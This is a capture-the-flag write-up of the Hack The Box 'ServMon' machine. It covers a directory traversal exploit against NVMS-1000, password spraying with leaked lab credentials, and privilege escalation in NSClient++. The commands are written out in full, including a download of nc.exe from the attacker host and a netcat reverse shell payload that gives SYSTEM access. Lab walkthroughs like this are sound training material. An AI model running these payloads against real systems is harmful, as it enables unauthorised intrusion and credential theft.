Posts Hack The Box - ServMon Writeup
Post
Cancel

Hack The Box - ServMon Writeup

e1355d5b4dfcef22796ab29f18d753d7.png

IPOSDifficultyRelease Date
10.10.10.184WindowsEasy11 April 2020

Enumeration

As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
kali@kali:~$ nmap -sC -sV -T4 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 05:20 EDT

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:                                                                                                                 
|_http-title: Site doesn't have a title (text/html).                                                                            
135/tcp  open  msrpc         Microsoft Windows RPC                                                                              
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                      
445/tcp  open  microsoft-ds?                                                                                                    
5666/tcp open  tcpwrapped                                                                                                       
6699/tcp open  tcpwrapped
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.44 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/ServMon. Any commands on the local machine will be run from this directory unless stated otherwise.

FTP

Anonymous login to FTP is allowed. Logging in with ftp 10.10.10.184 and the username anonymous shows a Users folder with folders Nathan and Nadine. There is a Confidential.txt file in Nadine that reveals there is a Passwords.txt file on Nathan's desktop.

HTTP

Navigating to the host in a browser reveals a login page for NVMS 1000.

searchsploit

Running NVMS in searchsploit(searchsploit nvms) reveals a directory travelsal exploit. This could be used to grab the Passwords.txt file mentioned in the note from Nadine.

NVMS-1000 Directory Traversal

The exploit (CVE-2019-20085) reveals a POC for reading files on the host.

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Grabbing Passwords.txt

Using BurpSuite it is possible to edit the request and grab the passwords file. Starting a proxy and loading the page is all that is needed. Once the request has been intercepted, changing the GET to /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt and forwarding the request should load the password file in the browser.

2f65dce5cb04e5b82dc54312a92c4c1c.png

The contents of this file is copied into a pass.txt file in the working directory.

pass.txt

1
2
3
4
5
6
7
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Get User

Using the passwords it is possible to gain access to the host. Password spraying is possible since the users nadine and nathan are known.

Password spraying

using crackmapexec with the pass.txt file will spray the username and passwords and return any combinations that work.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kali@kali:~/Desktop/ServMon$ crackmapexec smb 10.10.10.184 -u nathan -p pass.txt 
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
kali@kali:~/Desktop/ServMon$ crackmapexec smb 10.10.10.184 -u nadine -p pass.txt 
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 

The combination nadine:L1k3B1gBut7s@W0rk is a valid combination.

SSH Login

The credentials found can be used to login via SSH with ssh nadine@10.10.10.184 and using the password when prompted. The user.txt file can be found in the Desktop folder.

NSClient++

Navigating to https://10.10.10.184:8443 reveals a web app named NSClient++. The page opens to a password prompt. Selecting Forgotten Password? reveals a command that could be used to find the password.

Find password

Returning to the open SSH session as nadine and changing the directory to C:\Program Files\NSClient++ and running the command nscp.exe web password --display reveals the password for the web app. The password is ew2x6SsGTxjRwXOT

cb14915de71e01e50b354bfcc327c9ab.png

Attempting Logging in

When trying to use the pasword an error is shown stating that Login is not allowed. Looking at the configuration file in the NSClient++ directory shows that only clients from 127.0.0.1 are allowed access.

Open SSH tunnel

To connect as a localhost user an SSH tunnel can be opened with the command ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184 and logging in with Nadine's password when prompted. With an ssh tunnel open. The web app can now be accessed via https://127.0.0.1:8443 and the password will be accepted allowing logon.

Privilege Escalation

Using this exploit it is possible to execute remote code. Since the NSClient++ application runs as nt authority/system it is possible to upload netcat on to the host and establish a reverse shell as administrator.

Download netcat

A working copy of nc.exe can be downloaded from this GitHub repo. This file is placed in the working directory once downloaded.

Host nc.exe

Navigating to the working directory and running the command python3 -m http.server will open a web server on port 8000. This will be used to transfer the netcat binary from the attacking kali machine to the host.

Download nc.exe on host

In the open SSH session as nadine switch to powershell by running powershell.exe. With a powershell session running the netcat file can be downloaded. cd to C:/Temp and run Invoke-WebRequest -Uri "http://10.10.14.18:8000/nc.exe" -OutFile nc.exe. Changing the IP address for the IP of the kali attacking machine.

Start a netcat listener

To receive the connection from the reverse shell a netcat listener must be opened. Open a new terminal window and run the command nc -nvlp 4455. Leave this window open and running as our connection will appear here once the exploit runs.

Exploiting NSClient++

With everything in place it is easy to run the exploit. First copy the exploit from the link above into a python script and set the file to executable with chmod +x script.py. Once the file is executable, run with the below command changing the IP address and port to match the netcat listener.

1
./script.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"

The exploit should run.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
kali@kali:~/Desktop/ServMon$ ./script.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.18 4455 -e cmd.exe"
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: sldqvLFSGsK)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .

And after a few moments the netcat listener will open a reverse shell as nt authority\system.

126694569c950faccf465305f58c96c4.png

The root flag can be found in the Desktop folder of the Administrator user.

This post is licensed under CC BY 4.0 by the author.